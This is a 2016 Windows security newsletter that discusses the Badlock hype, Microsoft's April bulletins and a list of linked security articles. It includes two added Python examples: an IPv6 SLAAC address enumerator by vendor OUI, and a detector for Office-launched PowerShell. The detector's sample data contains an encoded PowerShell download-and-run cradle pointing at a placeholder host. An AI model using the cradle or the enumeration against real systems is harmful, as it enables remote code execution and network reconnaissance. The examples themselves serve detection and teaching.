WindowSecurity.com - Monthly Newsletter - April 2016

Welcome to the WindowSecurity.com newsletter by Richard Hicks (MCSE, MCITP:EA, MCSA, Enterprise Security MVP), independent consultant and Microsoft network security and remote access expert. Each month we will bring you interesting and helpful information pertaining to Windows Security. We want to know what all of *you* are interested in hearing about, so please send your questions and suggestions for future newsletter content to winsec@richardhicks.com.


1. Editor's Corner

With this month’s round of security updates, Microsoft released MS16-047, a security update that addresses vulnerabilities in the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) remote protocols in all supported versions of Windows desktop and server operating systems. What’s interesting about this update is that the researchers who discovered the underlying vulnerability essentially promoted it as if it were a new product! They gave the vulnerability a catchy name (Badlock), created a logo for it, registered a domain name and built a web site, and even preannounced it to the media weeks before the patch was available. Presumably this was all done to promote the researchers and perhaps their employer, but the ramifications of this strategy require careful consideration.

--Rich

Badlock

It used to be that when a vulnerability was discovered, it was disclosed (hopefully responsibly!) and given a Common Vulnerabilities and Exposures (CVE) number. Now it seems the trend is moving toward publicizing and promoting the vulnerability. Of course naming has been a thing for quite some time: Code Red, Nimda, Blaster, Slammer, etc. However, those were worms, named colloquially and after the fact. None were named for the sole purpose of sensationalizing or promoting the vulnerabilities or their discoverers.

Heartbleed changed all that. This was one of the first vulnerabilities hyped and promoted using commercial marketing techniques like logos, web sites, and press releases. In the specific case of Heartbleed, it was certainly for a good cause. It made everyone take notice of a very serious vulnerability in a key security component used to secure much of the public Internet today.

So it would seem that Badlock and the hype surrounding it would also be beneficial. Turns out, perhaps not so much. When Microsoft released MS16-047 to address the vulnerability, it was only rated Important! The vulnerability with a name and its own web site doesn’t even rate Microsoft’s highest severity rating of Critical.

As it turns out, “Badlock” is an elevation of privilege vulnerability that requires the attacker to mount a man-in-the-middle attack against SAM and LSAD traffic, that is, to already be positioned on the network path between a client and a domain controller or member server. In practice that means the attacker has already breached the organization and established a foothold. It is still a serious vulnerability that should be patched promptly, because it is exactly the kind of bug that helps an intruder move laterally once inside. But it is not directly exploitable from the Internet and cannot be triggered against a host without that network position, which greatly reduces the exposure. Definitely nowhere near the seriousness of Heartbleed.

Is there a lesson to be learned here? I believe there is. The lesson is don’t be fooled by hype. Be diligent. Do your homework. Pay attention, but don’t get caught up in the hype! I expect more vulnerabilities in the future to be publicized and promoted in this same way, so be prepared. Don’t be panicked when the next “super critical vulnerability that will destroy the Internet and society as we know it” is announced. Yes, it could be serious. If it is, do what you’ve always done. Assess the vulnerability in your organization and mitigate as usual.

The sky isn’t falling. Keep calm and patch on.


2. Richard M. Hicks Consulting

Looking for assistance with the design, implementation, or support of a Microsoft DirectAccess remote access solution? Need help migrating from Microsoft Forefront Threat Management Gateway (TMG) 2010? Interested in guidance for integrating on-premises networks with Microsoft Azure or Amazon Web Services? I can help!

I am a Microsoft Certified Solutions Associate (MCSA) with nearly 20 years’ experience working with Microsoft network security platforms. I’ve deployed DirectAccess and VPN solutions for some of the largest organizations in the world. I’ve also helped organizations large and small implement hybrid cloud network solutions, migrate from Forefront TMG to other security platforms, and perform other security related services.

For more information about consulting services, click here.



3. Microsoft Security Bulletins for April 2016

For the month of April Microsoft released 13 security bulletins, 6 of which are rated critical and 7 important. Affected software includes Internet Explorer and Edge browsers, Microsoft Office, .NET Framework, Skype for Business and Lync, and all supported versions of Windows. Cumulative updates for IE and Edge are always essential. Of course MS16-047 should be addressed, but clearly this vulnerability was not as serious as it was made out to be.

For more information about April’s security bulletins click here.

4. Microsoft Security Advisories for April 2016

This month Microsoft released security advisory 3152550, an update to improve wireless mouse input filtering. It addresses a vulnerability in which keyboard HID packets can be injected into a Microsoft wireless mouse device through its USB dongle, which would allow an attacker within radio range to type arbitrary keystrokes on the host.


5. Security Articles of Interest

  1. Lots of hype surrounded this month’s announcement of a security vulnerability in Microsoft Windows and Samba. A catchy name, a dedicated web site, even a slick logo. Is it helping? Maybe, maybe not. After all the hype, the vulnerability turned out not to be so critical, and not exploitable without a man-in-the-middle position on the network. Could all this hype do more harm than good? Veteran security expert Chris Wysopal thinks so.
    http://techcrunch.com/2016/04/11/hyping-vulnerabilities-is-no-longer-helping-application-security-awareness/

  2. The IPv6 address space is vast. With a /64 prefix being the standard subnet, you’d think that performing network reconnaissance would be prohibitively difficult. However, Stateless Address Autoconfiguration (SLAAC) has traditionally derived the interface identifier from the host’s MAC address (modified EUI-64), a deterministic scheme that leaves the vendor OUI visible and sharply reduces the number of bits an attacker has to guess. The IETF recently published RFC 7707, “Network Reconnaissance in IPv6 Networks,” which describes how existing IPv4 scanning techniques can be adapted to IPv6 as well as some new IPv6-specific ones.
    http://blog.si6networks.com/2016/03/the-ietf-has-just-published-rfc-7707_12.html
    https://tools.ietf.org/rfc/rfc7707.txt
    https://www.insinuator.net/2016/04/advanced-ipv6-network-reconnaissance/
  3. With Microsoft’s formal deprecation of Network Access Protection (NAP) and its subsequent removal of the client-side components in Windows 10, organizations are looking for new ways to provide conditional access for both trusted and non-trusted devices. Azure Active Directory (AAD) can be leveraged to provide remote device health attestation and conditional access for VPN. Details here:
    http://blogs.technet.com/b/tip_of_the_day/archive/2016/03/12/tip-of-the-day-the-conditional-access-framework-and-device-compliance-for-vpn.aspx

    http://blogs.technet.com/b/tip_of_the_day/archive/2016/03/14/tip-of-the-day-the-conditional-access-framework-and-device-compliance-for-vpn-part-2.aspx

    http://blogs.technet.com/b/tip_of_the_day/archive/2016/03/15/tip-of-the-day-the-conditional-access-framework-and-device-compliance-for-vpn-part-3.aspx

    http://blogs.technet.com/b/tip_of_the_day/archive/2016/03/16/tip-of-the-day-the-conditional-access-framework-and-device-compliance-for-vpn-part-4.aspx
  4. Security researchers are warning of recently discovered attacks in which the attacker uses Word documents with malicious macros to launch PowerShell, so the malware runs in memory without dropping a file to disk. These attacks are targeted: the code checks the system architecture and looks for particular types of systems, while attempting to evade sandboxes and security products.
    http://www.computerworld.com/article/3043570/security/documents-with-malicious-macros-deliver-fileless-malware.html
  5. Microsoft recently announced a new Secure Development blog. This blog will include valuable information focused on providing developers with information about development best practices, new tools and services, and much more.
    https://blogs.msdn.microsoft.com/secdevblog/
  6. Microsoft OneDrive and Microsoft Online Services were recently added to Microsoft’s Bug Bounty Program. Security researchers identifying vulnerabilities in these areas are eligible to receive up to $15,000.00 USD. More details here:
    https://blogs.technet.microsoft.com/msrc/2016/03/18/microsoft-bounty-programs-announce-expansion-bounty-for-microsoft-onedrive/
  7. With great power comes great responsibility. Azure is quite a powerful platform too. Microsoft has a tremendous responsibility to its customers to protect their valuable data residing on their cloud platforms. Trust plays a key role, but what do privacy and control really mean? This Microsoft Cyber Trust blog post explores that important question.
    http://blogs.microsoft.com/cybertrust/2016/03/21/the-trusted-cloud-what-do-privacy-and-control-really-mean/
  8. For cloud hosting providers using the Microsoft Hyper-V virtualization platform, ensuring complete isolation between customers is vital. However, one persistent challenge has been the provider’s own access to each customer’s assets. They obviously require access to them, as they are charged with managing them. But what happens when a rogue administrator abuses that privilege? Or an attacker successfully breaches the cloud provider’s management infrastructure? Shielded Virtual Machines, a new feature of Hyper-V in Windows Server 2016, aims to resolve many of those challenges.
    http://windowsitpro.com/hyper-v/super-secure-hyper-v-environments-shielded-vms-2016
  9. Microsoft has a lot of experience defending against persistent attackers. They are, after all, responsible for defending myriad assets residing across their multitude of cloud platforms. They’ve obviously learned a lot by doing so, and thankfully they share that knowledge with the rest of the community, as they’ve done here.
    http://blogs.microsoft.com/cybertrust/2016/03/28/defending-against-persistent-attackers-what-weve-learned/
  10. WordPress is one of the more popular Content Management Systems (CMS) in use on the Internet today. Running WordPress on your own web server is common, but many take advantage of the hosted platform at WordPress.com. The advantages are many, but the one crucial drawback to doing so was the lack of support for HTTPS. Thanks to the Let’s Encrypt initiative, that has finally been resolved. Why use HTTPS for information that is hosted on a public web site, you ask? Keep in mind that privacy is only one aspect of using HTTPS. Another critically important advantage for HTTPS on public web sites is integrity. Because HTTPS authenticates the server and protects every byte in transit, a browser can detect content that was tampered with on the way (by a hostile hotspot or an ad-injecting proxy, for example), and that matters even when the content itself is public. Definitely a huge win for WordPress!
    https://en.blog.wordpress.com/2016/04/08/https-everywhere-encryption-for-all-wordpress-com-sites/
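To make the point in item 2 concrete, here is an added example written for this newsletter (it is not code from RFC 7707’s authors or from SI6 Networks). It derives the modified EUI-64 interface identifier that legacy SLAAC builds from a MAC address, recognizes such identifiers in observed addresses, and enumerates the candidate addresses for one vendor OUI, which is how the 64-bit identifier space collapses to 24 bits. The prefixes and MAC addresses are constructed for illustration.

```python
"""Added example: SLAAC (modified EUI-64) address derivation and why it makes
IPv6 reconnaissance tractable. Not code from RFC 7707 or SI6 Networks; the
prefixes and MAC addresses used are constructed for illustration."""
import ipaddress
from typing import Iterator


def mac_to_eui64_iid(mac: str) -> int:
    """Modified EUI-64 (RFC 4291, Appendix A): split the 48-bit MAC into the
    24-bit OUI and 24-bit NIC part, insert 0xFFFE between them, and flip the
    universal/local bit (0x02 in the first octet)."""
    octets = bytes(int(x, 16) for x in mac.replace("-", ":").split(":"))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    eui64 = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    eui64[0] ^= 0x02
    return int.from_bytes(eui64, "big")


def slaac_address(prefix: str, mac: str) -> ipaddress.IPv6Address:
    """The address a host with this MAC gets on this /64 with legacy SLAAC."""
    net = ipaddress.IPv6Network(prefix, strict=False)
    if net.prefixlen != 64:
        raise ValueError("SLAAC interface identifiers are 64 bits; need a /64")
    return ipaddress.IPv6Address(int(net.network_address) | mac_to_eui64_iid(mac))


def is_eui64_derived(addr: str) -> bool:
    """RFC 7707 heuristic: an interface identifier with 0xFFFE in its middle
    two bytes is almost certainly MAC-derived, so the vendor OUI is exposed and
    only the 24 NIC-specific bits remain unknown."""
    iid = int(ipaddress.IPv6Address(addr)) & ((1 << 64) - 1)
    return (iid >> 24) & 0xFFFF == 0xFFFE


def scan_space_bits(addr: str) -> int:
    """Bits an attacker must brute-force to find similar hosts on the subnet:
    24 for an EUI-64 identifier with a known vendor OUI, 64 for a randomized
    (RFC 4941 temporary or RFC 7217 stable-opaque) identifier."""
    return 24 if is_eui64_derived(addr) else 64


def candidates_for_oui(prefix: str, oui: str) -> Iterator[ipaddress.IPv6Address]:
    """Every SLAAC address a host whose NIC carries vendor `oui` could hold on
    `prefix`: 2**24 targets, which is feasible to sweep, versus 2**64."""
    oui_bytes = bytes(int(x, 16) for x in oui.split(":"))
    for nic in range(1 << 24):
        mac = ":".join(f"{b:02x}" for b in oui_bytes + nic.to_bytes(3, "big"))
        yield slaac_address(prefix, mac)


if __name__ == "__main__":
    # Constructed example: documentation prefix and a made-up MAC address.
    host = slaac_address("2001:db8:1:2::/64", "00:1b:21:aa:bb:cc")
    print(host)                                                  # 2001:db8:1:2:21b:21ff:feaa:bbcc
    print(is_eui64_derived(str(host)), scan_space_bits(str(host)))  # True 24
    print(scan_space_bits("2001:db8:1:2:a1b2:c3d4:e5f6:718"))    # 64
    print(next(candidates_for_oui("2001:db8:1:2::/64", "00:1b:21")))  # 2001:db8:1:2:21b:21ff:fe00:0
```

The defensive takeaway is the last two functions: if your hosts’ addresses contain `ff:fe` in the identifier, an attacker who knows the NIC vendor needs only a 2^24 sweep per subnet, so enabling RFC 7217 stable-opaque or RFC 4941 temporary identifiers removes that shortcut.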
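For item 4, here is an added example written for this newsletter (it is not code from the Computerworld article or from any vendor) of the detection logic a defender would want for the macro-to-PowerShell chain: an Office process spawning a script host, the usual evasion switches, and an encoded command that keeps the download cradle off the visible command line. The event layout (tab-separated timestamp, host, parent image, child image, command line) and all of the events are constructed for illustration; they are not the exact format of Sysmon or the Windows Security log.

```python
"""Added example: detecting Office -> PowerShell launches with evasion switches
and decoding -EncodedCommand. Not code from the article or any product; the
event format and the sample events below are constructed."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Switches and cmdlets that appear in legitimate admin scripts but almost
# never together under an Office parent.
SUSPICIOUS = re.compile(
    r"(?i)(?:-e(?:nc(?:odedcommand)?)?\b|-nop\b|-w(?:indowstyle)?\s+hidden"
    r"|bypass|downloadstring|iex\b)"
)
ENCODED_ARG = re.compile(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)")

# Constructed payload, staged the way attackers stage it: Base64 over UTF-16LE,
# so "DownloadString" never appears on the visible command line.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

OFFICE = "C:\\Program Files\\Microsoft Office\\Office15\\"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = "\n".join([  # constructed process-creation events
    "2016-04-12T09:14:02Z\tWS01\tC:\\Windows\\explorer.exe\t" + OFFICE + "WINWORD.EXE\t\"WINWORD.EXE\" /n invoice.docm",
    "2016-04-12T09:14:09Z\tWS01\t" + OFFICE + "WINWORD.EXE\t" + PS + "\tpowershell.exe -NoP -W Hidden -Enc " + ENCODED,
    "2016-04-12T09:20:44Z\tWS02\tC:\\Windows\\explorer.exe\t" + PS + "\tpowershell.exe -File C:\\scripts\\backup.ps1",
    "2016-04-12T09:31:10Z\tWS03\t" + OFFICE + "EXCEL.EXE\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c echo hello",
])


@dataclass
class Alert:
    timestamp: str
    host: str
    parent: str
    child: str
    indicators: List[str]
    decoded_command: Optional[str]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (Base64 of UTF-16LE)."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events_text: str) -> List[Alert]:
    """Alert on every Office -> script host spawn, enriched with the evasion
    switches found on the command line and inside the decoded command."""
    alerts = []
    for line in events_text.strip().splitlines():
        ts, host, parent, child, cmdline = line.split("\t", 4)
        parent_name = parent.rsplit("\\", 1)[-1].lower()
        child_name = child.rsplit("\\", 1)[-1].lower()
        if parent_name not in OFFICE_PARENTS or child_name not in SCRIPT_HOSTS:
            continue  # explorer.exe -> powershell.exe is routine admin activity
        indicators = [f"{parent_name} spawned {child_name}"]
        indicators += [m.group(0) for m in SUSPICIOUS.finditer(cmdline)]
        decoded = decode_encoded_command(cmdline)
        if decoded:
            # The point of -Enc is to keep these off the command line, so
            # scan the decoded script as well.
            indicators += ["decoded:" + m.group(0) for m in SUSPICIOUS.finditer(decoded)]
        alerts.append(Alert(ts, host, parent_name, child_name, indicators, decoded))
    return alerts


def severity(alert: Alert) -> str:
    """High when a download-and-run cradle is visible, medium otherwise."""
    text = " ".join(alert.indicators).lower()
    return "high" if "downloadstring" in text or "iex" in text else "medium"


if __name__ == "__main__":
    for a in analyse(SAMPLE_EVENTS):
        print(f"{a.timestamp} {a.host} [{severity(a)}] {a.indicators}")
        if a.decoded_command:
            print("   decoded:", a.decoded_command)
```

Note that the Excel-to-cmd.exe event still alerts even though its command line looks harmless: the parent/child relationship is the signal, and the switches and decoded cradle only raise the severity. Process-creation auditing with command-line logging (or Sysmon event 1) is what makes this data available in the first place.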


6. WindowSecurity.com Articles of Interest

  1. The Risk of Running Obsolete Software – Part 2

  2. Defense in Depth – Is It Always Best Practice?

  3. The Risk of Running Obsolete Software – Part 3

  4. Netikus EventSentry: Voted WindowSecurity.com Readers’ Choice Award Winner – Event Log Monitoring

  5. Focal Points for Managing Access to your AWS Management Console

7. Windows Security Tip of the Month

As it turns out, the “Badlock” bug addressed with MS16-047 wasn’t nearly as critical as all the hype made it out to be. It is an important vulnerability that should be mitigated as quickly as possible though, no doubt. The vulnerability could be used by attackers for lateral movement inside your organization after a successful breach. Preventing lateral movement is crucial for making an attacker’s task more difficult once they are inside. Following administrative best practices will reduce this exposure, especially for administrative workstations. Microsoft recently published some excellent guidance for securing administrative workstations. More details here.